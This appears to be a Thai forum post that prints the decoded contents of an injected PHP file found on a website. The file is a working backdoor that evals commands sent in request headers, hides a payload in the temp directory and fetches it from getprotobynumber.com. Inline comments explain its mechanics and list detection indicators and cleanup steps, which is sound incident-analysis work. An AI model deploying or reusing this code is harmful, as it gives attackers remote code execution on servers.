สคริปต์นี้จะเก่าไปมั้ย
register_globals on
short_open_tag on
แล้วไฟล์ /calendar/text.php ที่เข้ารหัสไว้มันคือ ....
<?php
if (!defined('determinator')){
// Walks every query-string parameter and replaces its value with '' when the
// value contains the substring 'union' or 'select'. It rewrites $_GET in place,
// so any page this code is included in sees the altered parameters too.
function filter(){
foreach ($_GET as $k=>$v){
// NOTE(review): strpos() returns 0 (falsy) for a match at offset 0 and compares
// case-sensitively, so this is a partial keyword check and should not be counted
// as SQL-injection protection for the host application.
if (strpos($v,'union')){$_GET[$k]='';}
elseif (strpos($v,'select')){$_GET[$k]='';}
}
}
// Retrieves the body at $url and returns it as a string.
// Three transports are tried in order: file_get_contents() when the
// allow_url_fopen ini value equals '1', then cURL when curl_init() exists,
// and finally an HTML <img> tag pointing at $url.
// Every call is prefixed with @, so failures produce no PHP warnings or log
// entries; outbound traffic from the web server is the place to look instead.
function getfile($url){
if (ini_get('allow_url_fopen') == '1') {
return @file_get_contents($url);
}
elseif (function_exists('curl_init')){
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL,$url);
@curl_setopt($ch, CURLOPT_HEADER,false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,5);
// On success the function returns here, so curl_close() below only runs when
// curl_exec() gave a falsy result; in that case the function returns null.
if ($data = @curl_exec($ch)) {return $data;}
@curl_close($ch);
}
else {
// No server-side fetch is possible: the returned markup is a 1x1 image whose
// src is $url, so whatever renders it would issue the request instead.
return '<img src="'.$url.'" width="1px" height="1px" />';
}
}
// Creates (or truncates) $file, then fills it with whatever getfile($url)
// returns. Nothing is validated: the remote response is stored verbatim.
function upd($file,$url){
// Opening in 'w' mode and closing immediately leaves an empty file behind,
// which satisfies the is_file() checks here and in write().
$h0=@fopen($file,'w');
@fclose($h0);
if (@is_file($file)){ write($file,getfile($url)) ;};
}
// Overwrites $file with $content, but only when $file already exists as a
// regular file. After writing it sends the response header 'Y_Out: b2s=';
// that header on responses from a site is a usable detection indicator.
function write($file,$content){
if (@is_file($file)){
$h=@fopen($file,'w');
@fwrite($h,$content);
@fclose($h);
@header('Y_Out: b2s=');
}
}
// Main body of an injected remote-control stub (backdoor). What it does:
//   1. accepts commands carried in HTTP request headers,
//   2. keeps a hidden payload file in the temp directory and includes it,
//   3. downloads that payload from a hard-coded host when it is missing.
// Indicators visible in this code: request headers read as HTTP_Y_AUTH,
// HTTP_EXECPHP, HTTP_UPDATE, HTTP_PUTCODE; response headers Y_Versio and Y_Out;
// a dot-file named with a 32-hex-character MD5 in the temp directory; outbound
// HTTP to getprotobynumber[.]com (path /i/rem.php).
// Response: remove the injected code and the temp file, and treat the site as
// compromised (find how the file was modified, rotate credentials).
$type='upd';
$ver='1.12';
// Function names held in variables so the calls below appear as $de(...);
// $en is assigned but not used in the code shown here.
$en="base64_encode";
$de="base64_decode";
$host=strtolower(@$_SERVER["HTTP_HOST"]);
// $sc is used both as the expected value of the auth header and as the payload
// file name. It is an MD5 over host name, PHP version, $ver and OS name.
$sc=@md5($host.PHP_VERSION.$ver.PHP_OS);
// Defining the constant makes the enclosing !defined('determinator') guard skip
// this body if the same stub is included again during the request.
define('determinator',1); filter();
if ($uri=$host.@$_SERVER['REQUEST_URI']){
// Temp directory: '/tmp/' by default; TMP, TMPDIR and TEMP from $_ENV are
// checked in that order and the last non-empty one wins.
$tmp='/tmp/';
if (!empty($_ENV['TMP'])) { $tmp = $_ENV['TMP'].'/'; }
if (!empty($_ENV['TMPDIR'])) { $tmp = $_ENV['TMPDIR'].'/'; }
if (!empty($_ENV['TEMP'])) { $tmp = $_ENV['TEMP'].'/'; }
// Payload path is <tempdir>/.<md5>; the leading dot hides it from plain listings.
$tmp=$tmp.'.'.$sc;
// Command channel: only entered when the request's Y_Auth header equals $sc.
if (@$_SERVER["HTTP_Y_AUTH"]==$sc){
@header('Y_Versio: '.$ver.$type);
// Base64-decodes the Execphp request header and runs it with eval(): arbitrary
// PHP execution for whoever sends the request, followed by an immediate exit.
if ($code=$de(@$_SERVER['HTTP_EXECPHP'])){
@eval($code);
exit(0);
}
// Update header: decoded value is a URL whose content replaces the payload file.
if ($cmd=$de(@$_SERVER['HTTP_UPDATE'])){upd($tmp,$cmd);}
// Putcode header: decoded value is written into the payload file directly
// (write() does nothing unless the file already exists).
if ($cmd=$de(@$_SERVER['HTTP_PUTCODE'])){write($tmp,$cmd);}
}
$uri=@urlencode($uri);
// The stored payload is executed as PHP on every request that reaches this stub.
if (@is_file($tmp)){@include_once ($tmp);}
// No payload yet: fetch one. The host name is split into concatenated fragments,
// which defeats a plain string search for the domain; the request reports the
// page URI ($uri), the key ($sc) and $type to the remote server.
else {upd($tmp,"http://"."getprot"."oby"."number".".com"."/i/rem".".php?u=".$uri."&k=".$sc."&t=".$type);}
}
}?>
...จะเช็กอะไรให้วุ่นวาย....